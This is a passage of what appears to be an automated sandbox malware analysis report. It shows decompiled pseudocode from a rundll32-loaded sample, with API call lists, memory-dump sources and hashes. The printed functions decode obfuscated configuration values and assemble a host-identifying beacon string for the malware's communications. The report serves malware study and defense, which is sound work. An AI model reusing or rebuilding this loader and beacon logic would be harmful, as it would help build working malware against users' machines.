							_t45 = E052D2659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x52dd238, 0, _t55);
						}
					}
					HeapFree( *0x52dd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E052D1F99(_t54);
				}
				return _t45;
			}
















                                                  0x052d73fd
                                                  0x052d740d
                                                  0x052d7410
                                                  0x052d7417
                                                  0x052d7419
                                                  0x052d7419
                                                  0x052d741c
                                                  0x052d7421
                                                  0x052d7428
                                                  0x052d743a
                                                  0x052d743e
                                                  0x052d744c
                                                  0x052d745a
                                                  0x052d745e
                                                  0x052d74ef
                                                  0x052d74ef
                                                  0x052d7464
                                                  0x052d7464
                                                  0x052d7469
                                                  0x052d7469
                                                  0x052d7470
                                                  0x052d747c
                                                  0x052d747e
                                                  0x052d7480
                                                  0x052d7482
                                                  0x052d7489
                                                  0x052d749b
                                                  0x052d749d
                                                  0x052d74a4
                                                  0x052d74a6
                                                  0x052d74ad
                                                  0x052d74b8
                                                  0x052d74b8
                                                  0x052d74a4
                                                  0x052d74bd
                                                  0x052d74c2
                                                  0x052d74c9
                                                  0x052d74e7
                                                  0x052d74e9
                                                  0x052d74e9
                                                  0x052d7480
                                                  0x052d74fb
                                                  0x052d74fb
                                                  0x052d74fd
                                                  0x052d7502
                                                  0x052d7504
                                                  0x052d7504
                                                  0x052d750f

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073093C0,?,00000000,30314549,00000014,004F0053,0730937C), ref: 052D74E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052D6814), ref: 052D74FB
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 8c1ee0a487f0eefd7d9da3f2980b15accf9464382ca0fac863391d64c6f88e80
                                                  • Instruction ID: 22cd7df2f782aff43f40a4a0c278d59d2e27810b1d82169f66458fc8a3e7796a
                                                  • Opcode Fuzzy Hash: 8c1ee0a487f0eefd7d9da3f2980b15accf9464382ca0fac863391d64c6f88e80
                                                  • Instruction Fuzzy Hash: E4314F72A21109BFEF11DBA4EC89EAABFBDEF44710F150055F505AB1A1DB709A04DB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D21CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 309 52d21cd-52d21e0 call 52d84d5 311 52d21e5-52d21f3 call 52d12d4 309->311 314 52d21f5-52d2202 call 52d809f 311->314 315 52d2222 311->315 320 52d2204-52d220d 314->320 321 52d2211-52d221c HeapFree 314->321 317 52d2224-52d222d call 52d84d5 315->317 324 52d222f-52d223c 317->324 325 52d2252-52d2258 317->325 320->311 323 52d220f 320->323 321->315 323->317 326 52d224c 324->326 327 52d223e-52d2242 324->327 329 52d224f 326->329 327->326 328 52d2244-52d224a 327->328 328->329 329->325
                                                  C-Code - Quality: 70%
                                                  			E052D21CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x52dd330;
				E052D84D5();
				while(1) {
					_t8 = E052D12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E052D809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x52dd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E052D84D5();
					if(_t19 != 0) {
						_t22 =  *0x52dd338; // 0x7309b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                  0x052d21d5
                                                  0x052d21d9
                                                  0x052d21da
                                                  0x052d21db
                                                  0x052d21e0
                                                  0x052d21e5
                                                  0x052d21ec
                                                  0x052d21f3
                                                  0x00000000
                                                  0x00000000
                                                  0x052d21f5
                                                  0x052d21fa
                                                  0x052d21fb
                                                  0x052d2202
                                                  0x052d221c
                                                  0x00000000
                                                  0x052d2204
                                                  0x052d2204
                                                  0x052d2206
                                                  0x052d2209
                                                  0x052d220d
                                                  0x00000000
                                                  0x00000000
                                                  0x052d220f
                                                  0x052d220d
                                                  0x052d2224
                                                  0x052d2224
                                                  0x052d2226
                                                  0x052d222d
                                                  0x052d222f
                                                  0x052d2235
                                                  0x052d223c
                                                  0x052d224c
                                                  0x052d2244
                                                  0x052d2247
                                                  0x052d2247
                                                  0x052d224f
                                                  0x052d224f
                                                  0x052d2258
                                                  0x052d2258
                                                  0x052d2222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 052D84D5: GetProcAddress.KERNEL32(36776F57,052D21E5), ref: 052D84F0
                                                    • Part of subcall function 052D12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 052D12FF
                                                    • Part of subcall function 052D12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 052D1321
                                                    • Part of subcall function 052D12D4: memset.NTDLL ref: 052D133B
                                                    • Part of subcall function 052D12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 052D1379
                                                    • Part of subcall function 052D12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 052D138D
                                                    • Part of subcall function 052D12D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 052D13A4
                                                    • Part of subcall function 052D12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 052D13B0
                                                    • Part of subcall function 052D12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 052D13F1
                                                    • Part of subcall function 052D12D4: FindFirstFileA.KERNELBASE(?,?), ref: 052D1407
                                                    • Part of subcall function 052D809F: lstrlen.KERNEL32(?,00000000,052DD330,00000001,052D2200,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9), ref: 052D80A8
                                                    • Part of subcall function 052D809F: mbstowcs.NTDLL ref: 052D80CF
                                                    • Part of subcall function 052D809F: memset.NTDLL ref: 052D80E1
                                                  • HeapFree.KERNEL32(00000000,052DD00C,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9,052DD00C,?,052D23E9), ref: 052D221C
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 72a91d81bdf9deca51afdd1986271705c241447ba7b849ad3b7ead8678f8f218
                                                  • Instruction ID: 78dca4c7302e4a91952f3cf2e682112942058fece634946b6d8681fefe69515e
                                                  • Opcode Fuzzy Hash: 72a91d81bdf9deca51afdd1986271705c241447ba7b849ad3b7ead8678f8f218
                                                  • Instruction Fuzzy Hash: 33012839734205EAE7009EE6DC8DF7AF6A9EF95264F500036BD89D6090D6A5DC429730
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 052D4094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E052D4094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x52dd278; // 0x63699bc3
				if(E052D8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x52dd2d4 = _v12;
				}
				_t25 =  *0x52dd278; // 0x63699bc3
				if(E052D8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x52dd278; // 0x63699bc3
						_t31 = E052D3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x52dd240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x52dd278; // 0x63699bc3
						_t32 = E052D3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x52dd244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x52dd278; // 0x63699bc3
						_t33 = E052D3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x52dd248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x52dd278; // 0x63699bc3
						_t34 = E052D3F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x52dd004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x52dd278; // 0x63699bc3
						_t35 = E052D3F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x52dd02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x52dd278; // 0x63699bc3
						_t36 = E052D3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E052D6ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E052DA5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x52dd278; // 0x63699bc3
						_t37 = E052D3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E052D6ED2(0, _t37) != 0) {
						_t102 =  *0x52dd32c; // 0x73095b0
						E052D75E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x52dd278; // 0x63699bc3
						_t38 = E052D3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x52dd27c; // 0x202a5a8
						_t18 = _t39 + 0x52de252; // 0x616d692f
						 *0x52dd2d0 = _t18;
						goto L52;
					} else {
						_t49 = E052D6ED2(0, _t38);
						 *0x52dd2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x52dd278; // 0x63699bc3
								_t41 = E052D3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x52dd27c; // 0x202a5a8
								_t19 = _t42 + 0x52de791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E052D6ED2(0, _t41);
							}
							 *0x52dd340 = _t43;
							HeapFree( *0x52dd238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                  0x052d4094
                                                  0x052d4097
                                                  0x052d40b7
                                                  0x052d40c5
                                                  0x052d40c5
                                                  0x052d40ca
                                                  0x052d40e4
                                                  0x052d42e2
                                                  0x052d42e4
                                                  0x00000000
                                                  0x052d40ea
                                                  0x052d40ea
                                                  0x052d40f1
                                                  0x052d4107
                                                  0x052d40f3
                                                  0x052d40f3
                                                  0x052d4100
                                                  0x052d4100
                                                  0x052d4111
                                                  0x052d4113
                                                  0x052d411d
                                                  0x052d4122
                                                  0x052d4122
                                                  0x052d411d
                                                  0x052d4129
                                                  0x052d413f
                                                  0x052d412b
                                                  0x052d412b
                                                  0x052d4138
                                                  0x052d4138
                                                  0x052d4143
                                                  0x052d4145
                                                  0x052d414f
                                                  0x052d4154
                                                  0x052d4154
                                                  0x052d414f
                                                  0x052d415b
                                                  0x052d4171
                                                  0x052d415d
                                                  0x052d415d
                                                  0x052d416a
                                                  0x052d416a
                                                  0x052d4175
                                                  0x052d4177
                                                  0x052d4181
                                                  0x052d4186
                                                  0x052d4186
                                                  0x052d4181
                                                  0x052d418d
                                                  0x052d41a3
                                                  0x052d418f
                                                  0x052d418f
                                                  0x052d419c
                                                  0x052d419c
                                                  0x052d41a7
                                                  0x052d41a9
                                                  0x052d41b3
                                                  0x052d41b8
                                                  0x052d41b8
                                                  0x052d41b3
                                                  0x052d41bf
                                                  0x052d41d5
                                                  0x052d41c1
                                                  0x052d41c1
                                                  0x052d41ce
                                                  0x052d41ce
                                                  0x052d41d9
                                                  0x052d41db
                                                  0x052d41e5
                                                  0x052d41ea
                                                  0x052d41ea
                                                  0x052d41e5
                                                  0x052d41f1
                                                  0x052d4207
                                                  0x052d41f3
                                                  0x052d41f3
                                                  0x052d4200
                                                  0x052d4200
                                                  0x052d420b
                                                  0x052d420d
                                                  0x052d4210
                                                  0x052d4211
                                                  0x052d4218
                                                  0x052d421a
                                                  0x052d421b
                                                  0x052d421b
                                                  0x052d4218
                                                  0x052d4222
                                                  0x052d4238
                                                  0x052d4224
                                                  0x052d4224
                                                  0x052d4231
                                                  0x052d4231
                                                  0x052d423c
                                                  0x052d424a
                                                  0x052d4254
                                                  0x052d4254
                                                  0x052d425b
                                                  0x052d4271
                                                  0x052d425d
                                                  0x052d425d
                                                  0x052d426a
                                                  0x052d426a
                                                  0x052d4275
                                                  0x052d4288
                                                  0x052d4288
                                                  0x052d428d
                                                  0x052d4293
                                                  0x00000000
                                                  0x052d4277
                                                  0x052d427a
                                                  0x052d4281
                                                  0x052d4286
                                                  0x052d4298
                                                  0x052d429a
                                                  0x052d42b0
                                                  0x052d429c
                                                  0x052d429c
                                                  0x052d42a9
                                                  0x052d42a9
                                                  0x052d42b4
                                                  0x052d42c0
                                                  0x052d42c5
                                                  0x052d42c5
                                                  0x052d42b6
                                                  0x052d42b9
                                                  0x052d42b9
                                                  0x052d42d3
                                                  0x052d42d8
                                                  0x052d42e5
                                                  0x052d42e9
                                                  0x052d42e9
                                                  0x00000000
                                                  0x052d4286
                                                  0x052d4275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D4119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D41AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D41E1
                                                  • HeapFree.KERNEL32(00000000,052D23DE,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D42D8
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: e8952b21402d99a5fb8c1d5eb40fe95d08cf79afd7e663ccd8aa9e937ef4b1c3
                                                  • Instruction ID: 44f4b24635d9e6a3eb85fd55000f089fcace809569088b5bbd76e67207361231
                                                  • Opcode Fuzzy Hash: e8952b21402d99a5fb8c1d5eb40fe95d08cf79afd7e663ccd8aa9e937ef4b1c3
                                                  • Instruction Fuzzy Hash: AA6173B0B35505BEDF10FBB8EC8DD5BFBEDAF582107244A25A406D7145EAB0E9418BB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052DA279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E052DA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x52dd018; // 0xf56cfa1f
				asm("bswap eax");
				_t27 =  *0x52dd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x52dd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x52dd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x52dd27c; // 0x202a5a8
				_t3 = _t30 + 0x52de633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x52dd02c,  *0x52dd004, _t25);
				_t33 = E052D1C1A();
				_t34 =  *0x52dd27c; // 0x202a5a8
				_t4 = _t34 + 0x52de673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E052D54BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x52dd27c; // 0x202a5a8
					_t6 = _t83 + 0x52de8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x52dd238, 0, _t96);
				}
				_t97 = E052D7649();
				if(_t97 != 0) {
					_t78 =  *0x52dd27c; // 0x202a5a8
					_t8 = _t78 + 0x52de8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x52dd238, 0, _t97);
				}
				_t98 =  *0x52dd32c; // 0x73095b0
				_a32 = E052D9395(0x52dd00a, _t98 + 4);
				_t42 =  *0x52dd2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x52dd27c; // 0x202a5a8
					_t11 = _t74 + 0x52de8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x52dd2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x52dd27c; // 0x202a5a8
					_t13 = _t71 + 0x52de8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x52dd238, 0, 0x800);
					if(_t100 != 0) {
						E052D7A80(GetTickCount());
						_t50 =  *0x52dd32c; // 0x73095b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x52dd32c; // 0x73095b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x52dd32c; // 0x73095b0
						_t103 = E052D8307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x52dc2ac);
							_push(_t103);
							_t62 = E052D3CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E052D1199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E052DA1B0();
								}
								HeapFree( *0x52dd238, 0, _v44);
							}
							HeapFree( *0x52dd238, 0, _t103);
						}
						HeapFree( *0x52dd238, 0, _t100);
					}
					HeapFree( *0x52dd238, 0, _a24);
				}
				HeapFree( *0x52dd238, 0, _t105);
				return _a12;
			}
















































                                                  0x052da279
                                                  0x052da279
                                                  0x052da279
                                                  0x052da280
                                                  0x052da286
                                                  0x052da28e
                                                  0x052da290
                                                  0x052da290
                                                  0x052da29d
                                                  0x052da2a8
                                                  0x052da2ab
                                                  0x052da2b6
                                                  0x052da2b9
                                                  0x052da2be
                                                  0x052da2c1
                                                  0x052da2c6
                                                  0x052da2c9
                                                  0x052da2d5
                                                  0x052da2e2
                                                  0x052da2e4
                                                  0x052da2ea
                                                  0x052da2ef
                                                  0x052da2fa
                                                  0x052da2fc
                                                  0x052da2ff
                                                  0x052da306
                                                  0x052da30a
                                                  0x052da30c
                                                  0x052da311
                                                  0x052da31d
                                                  0x052da31f
                                                  0x052da32b
                                                  0x052da32d
                                                  0x052da32d
                                                  0x052da338
                                                  0x052da33c
                                                  0x052da33e
                                                  0x052da343
                                                  0x052da34f
                                                  0x052da351
                                                  0x052da35d
                                                  0x052da35f
                                                  0x052da35f
                                                  0x052da365
                                                  0x052da378
                                                  0x052da37c
                                                  0x052da383
                                                  0x052da386
                                                  0x052da38b
                                                  0x052da396
                                                  0x052da398
                                                  0x052da39b
                                                  0x052da39b
                                                  0x052da39d
                                                  0x052da3a4
                                                  0x052da3a7
                                                  0x052da3ac
                                                  0x052da3b6
                                                  0x052da3b8
                                                  0x052da3c0
                                                  0x052da3d9
                                                  0x052da3dd
                                                  0x052da3e9
                                                  0x052da3ee
                                                  0x052da3f7
                                                  0x052da408
                                                  0x052da40c
                                                  0x052da415
                                                  0x052da41b
                                                  0x052da428
                                                  0x052da435
                                                  0x052da43b
                                                  0x052da447
                                                  0x052da44d
                                                  0x052da44e
                                                  0x052da455
                                                  0x052da459
                                                  0x052da45f
                                                  0x052da466
                                                  0x052da46d
                                                  0x052da473
                                                  0x052da47a
                                                  0x052da47e
                                                  0x052da489
                                                  0x052da490
                                                  0x052da494
                                                  0x052da49d
                                                  0x052da49d
                                                  0x052da4ae
                                                  0x052da4ae
                                                  0x052da4bd
                                                  0x052da4bd
                                                  0x052da4cc
                                                  0x052da4cc
                                                  0x052da4de
                                                  0x052da4de
                                                  0x052da4ed
                                                  0x052da4fe

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 052DA290
                                                  • wsprintfA.USER32 ref: 052DA2DD
                                                  • wsprintfA.USER32 ref: 052DA2FA
                                                  • wsprintfA.USER32 ref: 052DA31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052DA32D
                                                  • wsprintfA.USER32 ref: 052DA34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052DA35F
                                                  • wsprintfA.USER32 ref: 052DA396
                                                  • wsprintfA.USER32 ref: 052DA3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052DA3D3
                                                  • GetTickCount.KERNEL32 ref: 052DA3E3
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052DA3F7
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052DA415
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?,073095B0), ref: 052D8332
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(?,?,?,052DA428,?,073095B0), ref: 052D833A
                                                    • Part of subcall function 052D8307: strcpy.NTDLL ref: 052D8351
                                                    • Part of subcall function 052D8307: lstrcat.KERNEL32(00000000,?), ref: 052D835C
                                                    • Part of subcall function 052D8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,052DA428,?,073095B0), ref: 052D8379
                                                  • StrTrimA.SHLWAPI(00000000,052DC2AC,?,073095B0), ref: 052DA447
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(073087FA,00000000,00000000,74ECC740,052DA453,00000000), ref: 052D3CD8
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(?), ref: 052D3CE0
                                                    • Part of subcall function 052D3CC8: lstrcpy.KERNEL32(00000000,073087FA), ref: 052D3CF4
                                                    • Part of subcall function 052D3CC8: lstrcat.KERNEL32(00000000,?), ref: 052D3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 052DA466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052DA46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 052DA47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 052DA47E
                                                    • Part of subcall function 052D1199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 052D124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 052DA4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052DA4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,073095B0), ref: 052DA4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052DA4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052DA4ED
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: 6268781f871a6819fd876720e906aeba8634e5cf4beda0ea0473a00730d84441
                                                  • Instruction ID: dbe5fc4a12e1b348cd119352c7f999b2b362f4f21f983a27d0e0c0b5c0a37491
